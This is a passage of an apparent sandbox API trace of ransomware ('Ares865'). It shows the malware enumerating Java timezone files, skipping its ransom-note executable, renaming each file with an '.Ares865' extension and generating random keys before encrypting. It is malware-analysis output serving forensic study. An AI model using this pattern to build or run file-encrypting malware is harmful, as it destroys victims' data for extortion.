[0133.734] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0133.735] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7465fe40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x52aedd40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x52aedd40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0133.735] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.735] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0133.735] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Amsterdam" | out: lpString1="Amsterdam") returned="Amsterdam" [0133.735] lstrlenW (lpString="Amsterdam") returned 9 [0133.735] lstrlenW (lpString="Ares865") returned 7 [0133.735] lstrcmpiW (lpString1="sterdam", lpString2="Ares865") returned 1 [0133.735] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam.Ares865") returned 64 [0133.735] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\amsterdam"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\amsterdam.ares865"), dwFlags=0x1) returned 1 [0133.737] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Amsterdam.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\amsterdam.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.737] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1544) returned 1 [0133.737] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.738] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.738] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.740] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.741] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.741] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.742] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Andorra" | out: lpString1="Andorra") returned="Andorra" [0133.742] lstrlenW (lpString="Andorra") returned 7 [0133.742] lstrlenW (lpString="Ares865") returned 7 [0133.742] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra.Ares865") returned 62 [0133.742] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\andorra"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\andorra.ares865"), dwFlags=0x1) returned 1 [0133.744] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Andorra.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\andorra.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.744] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=968) returned 1 [0133.744] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.745] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.745] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.747] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.748] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.748] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.748] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Athens" | out: lpString1="Athens") returned="Athens" [0133.748] lstrlenW (lpString="Athens") returned 6 [0133.748] lstrlenW (lpString="Ares865") returned 7 [0133.749] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens.Ares865") returned 61 [0133.749] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\athens"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\athens.ares865"), dwFlags=0x1) returned 1 [0133.750] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Athens.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\athens.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.750] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1196) returned 1 [0133.751] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.751] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.751] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.753] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.754] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.754] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.755] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Belgrade.Ares865" | out: lpString1="Belgrade.Ares865") returned="Belgrade.Ares865" [0133.755] lstrlenW (lpString="Belgrade.Ares865") returned 16 [0133.755] lstrlenW (lpString="Ares865") returned 7 [0133.755] lstrcmpiW (lpString1="Ares865", lpString2="Ares865") returned 0 [0133.755] FindNextFileW (in: hFindFile=0x2ccee8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7465fe40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x7465fe40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x7465fe40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x4d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Berlin", cAlternateFileName="")) returned 1 [0133.755] lstrcmpiW (lpString1="Berlin", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0133.755] lstrcmpiW (lpString1="Berlin", lpString2="aoldtz.exe") returned 1 [0133.755] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Berlin" | out: lpString1="Berlin") returned="Berlin" [0133.755] lstrlenW (lpString="Berlin") returned 6 [0133.755] lstrlenW (lpString="Ares865") returned 7 [0133.756] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin.Ares865") returned 61 [0133.756] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\berlin"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\berlin.ares865"), dwFlags=0x1) returned 1 [0133.767] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Berlin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\berlin.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.768] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1236) returned 1 [0133.768] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.769] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.769] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.771] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.772] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.772] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.772] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Brussels" | out: lpString1="Brussels") returned="Brussels" [0133.772] lstrlenW (lpString="Brussels") returned 8 [0133.772] lstrlenW (lpString="Ares865") returned 7 [0133.772] lstrcmpiW (lpString1="russels", lpString2="Ares865") returned 1 [0133.773] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels.Ares865") returned 63 [0133.773] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\brussels"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\brussels.ares865"), dwFlags=0x1) returned 1 [0133.778] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Brussels.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\brussels.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.778] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1564) returned 1 [0133.778] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.779] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.779] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.782] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.783] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.783] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.783] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Bucharest" | out: lpString1="Bucharest") returned="Bucharest" [0133.783] lstrlenW (lpString="Bucharest") returned 9 [0133.783] lstrlenW (lpString="Ares865") returned 7 [0133.783] lstrcmpiW (lpString1="charest", lpString2="Ares865") returned 1 [0133.784] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest.Ares865") returned 64 [0133.784] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bucharest"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bucharest.ares865"), dwFlags=0x1) returned 1 [0133.785] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Bucharest.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\bucharest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.785] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1180) returned 1 [0133.785] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.786] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.786] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.789] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.790] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.790] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.790] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Budapest" | out: lpString1="Budapest") returned="Budapest" [0133.790] lstrlenW (lpString="Budapest") returned 8 [0133.790] lstrlenW (lpString="Ares865") returned 7 [0133.790] lstrcmpiW (lpString1="udapest", lpString2="Ares865") returned 1 [0133.791] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest.Ares865") returned 63 [0133.791] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\budapest"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\budapest.ares865"), dwFlags=0x1) returned 1 [0133.792] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\budapest.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.792] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1312) returned 1 [0133.792] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.793] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.793] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.795] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.796] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.796] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.797] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Chisinau" | out: lpString1="Chisinau") returned="Chisinau" [0133.797] lstrlenW (lpString="Chisinau") returned 8 [0133.797] lstrlenW (lpString="Ares865") returned 7 [0133.797] lstrcmpiW (lpString1="hisinau", lpString2="Ares865") returned 1 [0133.797] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau.Ares865") returned 63 [0133.797] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\chisinau"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\chisinau.ares865"), dwFlags=0x1) returned 1 [0133.799] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Chisinau.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\chisinau.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.799] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1212) returned 1 [0133.800] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.800] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.800] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.803] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.804] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.804] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.804] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Copenhagen" | out: lpString1="Copenhagen") returned="Copenhagen" [0133.804] lstrlenW (lpString="Copenhagen") returned 10 [0133.804] lstrlenW (lpString="Ares865") returned 7 [0133.804] lstrcmpiW (lpString1="enhagen", lpString2="Ares865") returned 1 [0133.805] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen.Ares865") returned 65 [0133.805] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\copenhagen"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\copenhagen.ares865"), dwFlags=0x1) returned 1 [0133.806] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Copenhagen.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\copenhagen.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.806] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1152) returned 1 [0133.807] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.807] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.807] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.810] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.810] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.810] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.811] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Dublin" | out: lpString1="Dublin") returned="Dublin" [0133.811] lstrlenW (lpString="Dublin") returned 6 [0133.811] lstrlenW (lpString="Ares865") returned 7 [0133.811] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin.Ares865") returned 61 [0133.811] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\dublin"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\dublin.ares865"), dwFlags=0x1) returned 1 [0133.813] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Dublin.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\dublin.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.813] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1916) returned 1 [0133.813] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.814] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.814] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.816] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.817] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.817] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.818] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Gibraltar" | out: lpString1="Gibraltar") returned="Gibraltar" [0133.818] lstrlenW (lpString="Gibraltar") returned 9 [0133.818] lstrlenW (lpString="Ares865") returned 7 [0133.818] lstrcmpiW (lpString1="braltar", lpString2="Ares865") returned 1 [0133.818] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar.Ares865") returned 64 [0133.818] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\gibraltar"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\gibraltar.ares865"), dwFlags=0x1) returned 1 [0133.820] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Gibraltar.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\gibraltar.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.820] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1676) returned 1 [0133.821] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.821] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.821] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.824] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0133.824] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0133.824] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.825] lstrcpyW (in: lpString1=0x2cce45e, lpString2="Helsinki" | out: lpString1="Helsinki") returned="Helsinki" [0133.825] lstrlenW (lpString="Helsinki") returned 8 [0133.825] lstrlenW (lpString="Ares865") returned 7 [0133.825] lstrcmpiW (lpString1="elsinki", lpString2="Ares865") returned 1 [0133.825] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki.Ares865") returned 63 [0133.825] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\helsinki"), lpNewFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\helsinki.ares865"), dwFlags=0x1) returned 1 [0133.827] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Helsinki.Ares865" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\helsinki.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0133.827] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1036) returned 1 [0133.827] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0133.828] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0133.828] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0133.831] CryptAcquireContextW (in: phProv=0x2ccce04, 